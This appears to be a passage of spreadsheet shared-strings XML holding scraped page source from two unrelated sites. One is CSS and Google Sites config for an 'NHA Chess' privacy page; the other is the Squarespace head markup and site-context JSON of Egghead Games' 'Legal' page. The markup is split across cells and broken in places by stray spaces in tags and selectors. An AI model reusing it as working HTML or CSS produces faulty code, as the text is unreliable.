    <t>.KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: Lato, sans-serif; font-size: 11pt;}.CMArNe{background-color: rgba(242,242,242,1);}.LBrwzc .TlfmSc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .YTv4We{color :</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(0,0,0,0.6399999857); display: block;}.LBrwzc .Mz8gvb{color: rgba(0,0,0,0.6399999857);}.LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.LBrwzc .wgxiMe{background-color: rgba(255,255,255,1);}.LBrwzc .qV4dIc{color: rgba(0,0,0,0.6399999857);}.LBrwzc .M9vuGd{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .Zjiec{color: rgba(0,0,0,0.8000000119);}.LBrwzc .IKA38e{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.LBrwzc .lhZOrc. IKA38e{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .j10yRb:hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .eBSUbc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .hDrhEe</t>
  </si>
  <si>
    <t>:hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .jgXgSe : hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .M9vuGd</t>
  </si>
  <si>
    <t>: hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .zDUgLc{border-bottom-color: rgba(204,204,204,1); border-bottom-width: 1px; border-bottom-style: solid;}.fOU46b .LBrwzc .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc .jgXgSe : hover{color: rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.zDUgLc{opacity: 1; border-bottom-style: none;}.fOU46b .LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .GBy4H .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe : hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H</t>
  </si>
  <si>
    <t>.zDUgLc{opacity: 1;}.fOU46b .GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(255,255,255,0.1199999973);}.XeSM4.G9Qloe.fOU46b .LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.XeSM4.G9Qloe.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.GBy4H .lhZOrc.</t>
  </si>
  <si>
    <t>IKA38e{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color: rgba(255,255,255,0.8700000048);}.GBy4H .hDrhEe:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .YTv4We{color: rgba(255,255,255,1);}.GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd{color: rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.QcmuFb{padding-left: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200px;}.TMjjoe{font-family: Lato, sans-serif; font-size: 9pt; line-height: 1.2; margin-top: 0px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 17pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 29pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 14pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media</t>
  </si>
  <si>
    <t>only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}&lt;/style&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL3-4ZDwLT-5D5_h27mW3WLZlmZbW3ZyF1VEL0uAanJD5DRebgRcmOULAbKeEe6_vYQJV2aj",1,"CMnHp8e4pf4CFXcAbwYdopEC2w",1681340259492864,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5758824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49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://1744606805-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https://sites.google.com/view/nhagames/privacy-policy/nha-chess",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[1681340259506,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"0e98a2fbe2cb82c89e5759ca90927b5e36dd4f646257806582371094b254c99a","normalizedPath":"view/nhagames/privacy-policy/nha-chess","pageTitle":"NHA Chess"};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nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;&lt;/script&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;const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data-sitename="nhagames" data-universe="1"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mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend: yfqBxc(preventMouseEvents=true|preventDefault=true); touchcancel:JMtRjd;" jsshadow jsname="GeGHKb" aria-label="Back to site" aria-disabled="false" tabindex="0" data-tooltip="Back to site" data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0"&gt;&lt;div class="VTBa7b MbhUzd" jsname="ksKsZd"&gt;&lt;/div&gt;&lt;span jsslot class="xjKiLb"&gt;&lt;span class="Ce1Y1c" style="top: -12px"&gt;&lt;svg class="V4YR2c" viewBox="0 0 24 24" focusable="false"&gt;&lt;path d="M0 0h24v24H0z" fill="none"/&gt;&lt;path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="E2UJ5" jsname="M6JdT"&gt;&lt;div class="rFrNMe b7AJhc zKHdkd" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow jsname="OH0EC" aria-expanded="true"&gt;&lt;div class="aCsJod oJeWuf"&gt;&lt;div class="aXBtI I0VJ4d Wic03c"&gt;&lt;span jsslot class="A37UZe qgcB3c iHd5yb"&gt;&lt;div role="button" class="U26fgb mUbCce fKz7Od i3PoXe M9Bg4d" jscontroller="VXdfxd" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tf</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" &gt;
  &lt;head&gt;
	  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;! -- This is Squarespace.</t>
  </si>
  <si>
    <t xml:space="preserve">--&gt;&lt;!-- eggheadgames --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;Legal &amp;mdash; Egghead Games&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430443081951-H3I519XG8HY5UZDEIPT5/favicon.ico?format=100w"/&gt;
&lt;link rel="canonical" href="https://eggheadgames.com/legal"/&gt;
&lt;meta property="og:site_name" content="Egghead Games"/&gt;
 &lt;meta property="og:title" content="Legal &amp;mdash; Egghead Games"/&gt;
&lt;meta property="og:url" content="https://eggheadgames.com/legal"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta itemprop="name" content="Legal — Egghead Games"/&gt;
&lt;meta itemprop="url" content="https://eggheadgames.com/legal"/&gt;
&lt;meta name="twitter:title" content="Legal — Egghead Games"/&gt;
</t>
  </si>
  <si>
    <t>&lt;meta name="twitter:url" content="https://eggheadgames.com/legal"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="description" content="" /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/l4Q7tWf1V9Z_fS28NyHdUVQZaraG0nigjMV-9eciTl6feTjffFHN4UJLFRbh52jhWD9uF2MkwcJ3ZQsKweJ3FcwtwAJtF2JXFsTyiaiaOcm1Zhy8jAs1jAu8SkoRdhXCZAi1-emyZeiydAmDOcFzdPU8ZhiGZABqZhBlZWw0SaBujW48Sagyjh90jhNlOfG0ZAi1-emyZeiydAmDO1FUiABkZWF3jAF8OcFzdPJwSY4zpe8ljPu0daZyH6qJ73IbMg6gJMJ7fbRKHyMMeMw6MKG4fHvgIMMjgfMfH6qJnbIbMg6eJMJ7fbKCMsMMeMC6MKG4fJCgIMMjgkMfH6qJ7bIbMg6JJMJ7fbRRHyMMeMX6MKG4fOMgIMMj2KMfH6qJn6IbMg6bJMJ7fbKwMsMMegI6MTMgEx0V769.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@800&amp;family=PT+Serif:ital,wght@1,400"&gt;
&lt;script type="text/javascript" crossorigin="anonymous" defer="defer" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" defer="defer" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-3320227cb9e2aae8adcaf-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-3320227cb9e2aae8adcaf-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" defer &gt;&lt;</t>
  </si>
  <si>
    <t>/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/common-2f15b9a72955cf722b96d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-2f15b9a72955cf722b96d-min.en-US.js" defer &gt;&lt; /script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-performance');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/performance-bb5721e73cd845bac5d20-min.en-US.js" defer &gt;&lt;/script&gt;&lt;script data-name="static-context"&gt;Static = window.</t>
  </si>
  <si>
    <t>Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","facebookApiVersion":"v6.0","rollups":{"squarespace-announcement-bar":{"js":"//assets.squarespace.com/universal/scripts-compressed/announcement-bar-cfb9ca391e5434cccb495-min.en-US.js"},"squarespace-audio-player":{"css":"//assets.squarespace.com/universal/styles-compressed/audio-player-702bf18174efe0acaa8ce-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/audio-player-d61ee22e7c56cbfe6bf6f-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/blog-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/blog-collection-list-44ab3d6f12cddbd366f28-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block-renderer-6f20ca9fe0574949433f3-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//assets.squarespace.com/universal/styles-compressed/chartjs-helpers-53c004ac7d4bde1c92e38-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/chartjs-helpers-aff2d23104600df085fdd-min.en-US.js"},"squarespace-comments":{"css":"//assets.squarespace.com/universal/styles-compressed/comments-cb7553e34a4da425817c4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/comments-8a4bd0618556454361bcc-min.en-US.js"},"squarespace-dialog":{"css":"//assets.squarespace.com/universal/styles-compressed/dialog-89b254b5c87045b9e1360-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/dialog-a03ec6aa3252c6c79a13c-min.en-US.js"},"squarespace-events-collection":{"css":"//assets.squarespace.com/universal/styles-compressed/events-collection-49c4a5f3dae67a728e3f4-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-9c7837f8e8c7ba99a4aa2-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-compressed/form-rendering-utils-3a18a40d3a28179a79fe4-min.en-US.js"},"squarespace-forms":{"css":"//assets.squarespace.com/universal/styles-compressed/forms-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/forms-97452adf98b259487f44f-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//assets.squarespace.com/universal/styles-compressed/gallery-collection-list-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/gallery-collection-list-ccf378030ccbdb6e9f20a-min.en-US.js"},"squarespace-image-zoom":{"css":"//assets.squarespace.com/universal/styles-compressed/image-zoom-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/image-zoom-95bf63ca6dc7a85183665-min.en-US.js"},"squarespace-pinterest":{"css":"//assets.squarespace.com/universal/styles-compressed/pinterest-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/pinterest-a4e9fe29fb0c5c424e870-min.en-US.js"},"squarespace-popup-overlay":{"css":"//assets.squarespace.com/universal/styles-compressed/popup-overlay-948192219c3257f767ec5-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-dd96b4be33459afc5aed8-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/universal/styles-compressed/product-quick-view-4a16a8a8c965386db2173-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/product-quick-view-f0768c380cf00ec103fd6-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-item-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-item-v2-4d72177710b16966fd304-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//assets.squarespace.com/universal/styles-compressed/products-collection-list-v2-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/products-collection-list-v2-86cb9526983c4269307f0-min.en-US.js"},"squarespace-search-page":{"css":"//assets.squarespace.com/universal/styles-compressed/search-page-9d0a55de1efafbb9218e1-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/search-page-af841a4de517d1960ffe3-min.en-US.js"},"squarespace-search-preview":{"js":"//assets.squarespace.com/universal/scripts-compressed/search-preview-8c25e422640fd7271eda1-min.en-US.js"},"squarespace-simple-liking":{"css":"//assets.squarespace.com/universal/styles-compressed/simple-liking-ef94529873378652e6e86-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/simple-liking-eec025f782ea0a61910bd-min.en-US.js"},"squarespace-social-buttons":{"css":"//assets.squarespace.com/universal/styles-compressed/social-buttons-1f18e025ea682ade6293a-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/social-buttons-a2f5c0c402abbb48429cb-min.en-US.js"},"squarespace-tourdates":{"css":"//assets.squarespace.com/universal/styles-compressed/tourdates-3d55c64c25996c7633fc2-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/tourdates-a1067e56130bfa7beb364-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//assets.squarespace.com/universal/styles-compressed/website-overlays-manager-7cecc648f858e6f692130-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/website-overlays-manager-7bf44765a935060ae0761-min.en-US.js"}},"pageType":2,"website":{"id":"554022b0e4b0b06c81b84245","identifier":"eggheadgames","websiteType":1,"contentModifiedOn":1589183666637,"cloneable":false,"hasBeenCloneable":false,"siteStatus":{},"language":"en-US","timeZone":"America/Los_Angeles","machineTimeZoneOffset":-25200000,"timeZoneOffset":-25200000,"timeZoneAbbr":"PDT","siteTitle":"Egghead Games","fullSiteTitle":"Legal \u2014 Egghead Games","siteDescription":"","location":{"mapZoom":10.0,"mapLat":36.85674694132305,"mapLng":-122.74393371582033,"markerLat":37.9099999,"markerLng":-122.54000000000002,"addressTitle":"Egghead Games","addressLine1":"PO Box 1142","addressLine2":"Solana</t>
  </si>
  <si>
    <t>Beach CA 92075","addressCountry":""},"logoImageId":"5542ab48e4b0b65e672b93de","shareButtonOptions":{"2":true,"1":true,"3":true},"logoImageUrl":"//images.squarespace-cdn.com/content/v1/554022b0e4b0b06c81b84245/1430432585258-CPJNO4B5QLNGUDV86EPW/color-on-white-%28preferred%29-512.png","authenticUrl":"https://eggheadgames.com","internalUrl":"https://eggheadgames.squarespace.com","baseUrl":"https://eggheadgames.com","primaryDomain":"eggheadgames.com","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":2,"userId":"715242531","screenname":"Michael Mee","addedOn":1430501801816,"profileUrl":"http://www.facebook.com/EggheadGames","iconUrl":"http://graph.facebook.com/715242531/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook"},{"serviceId":4,"userId":"2455235382","userName":"eggheadgamesllc","screenname":"Egghead Games","addedOn":1430502077180,"profileUrl":"https://twitter.com/eggheadgamesllc","iconUrl":"http://pbs.twimg.com/profile_images/457914834063880192/XSqIe-Wq_normal.png","collectionId":"5543babde4b04bf77e3bec77","iconEnabled":true,"serviceName":"twitter"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":true,"screenshotId":"120793eda6864076171de1dde9a8d141a49f26fff241bc3cb72056c89f203126","showOwnerLogin":false},"websiteSettings":{"id":"554022b0e4b0b06c81b84247","websiteId":"554022b0e4b0b06c81b84245","type":"Business","subjects":[],"country":"US","state":"CA","simpleLikingEnabled":true,"popupOverlaySettings":{"style":1,"enabledPages":[]},"commentLikesAllowed":false,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"contactPhoneNumber":"","businessHours":{"monday":{"text":"","ranges":[{}]},"tuesday":{"text":"","ranges":[{}]},"wednesday":{"text":"","ranges":[{}]},"thursday":{"text":"","ranges":[{}]},"friday":{"text":"","ranges":[{}]},"saturday":{"text":"","ranges":[{}]},"sunday":{"text":"","ranges":[{}]}},"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":false,"enableMailingListOptInByDefault":true,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled","size":"small","shape":"rect","color":"white"},"ampEnabled":true},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":"","cookieBannerAcceptType":"OPT_IN","cookieBannerOptOutCtaText":""},"websiteCloneable":false,"collection":{"title":"Legal","id":"5543b3e0e4b079a47a690f29","fullUrl":"/legal","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","gallery-arrow-style":"Round Corners","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Slideshow","gallery-info-overlay":"Always Show","gallery-loop":"false","gallery-navigation":"Thumbnails","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"350px","gridSpacing":"20px","hdr- bg-image":"{background-image:none;background-position:center center;background-size:auto;background-attachment:fixed;background-repeat:repeat}","product-gallery-auto-crop":"true","product-image-auto-crop":"true","tweak-v1-related-products-title-spacing":"50px"},"templateId":"503ba86de4b04953d0f49846","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/5016d42984ae3ecc9e018d91/1670/scripts/","betaFeatureFlags":["customer_account_creation_recaptcha","campaigns_asset_picker","crm_enforce_recaptcha_v3_enterprise","commerce_order_status_access","fluid_engine_clean_up_grid_contextual_change","block_annotations_revamp","crm_remove_subscriber","commerce_site_visitor_metrics","order_status_page_checkout_landing_enabled","crm_waitlist_enforce_recaptcha_v3_enterprise","member_areas_spanish_interviews","campaigns_thumbnail_layout","accounting_orders_sync","commerce_restock_notifications","campaigns_content_editing_survey","crm_retention_segment","campaigns_discount_section_in_automations","crm_default_newsletter_block_to_campaigns","is_feature_gate_refresh_enabled","commerce_clearpay","campaigns_new_subscriber_search","commerce_etsy_shipping_import","marketing_landing_page","site_user_email_change","viewer-role-contributor-invites","scripts_defer","campaigns_import_discounts","campaigns_discount_section_in_blasts","fluid_engine","customer_accounts_email_verification","c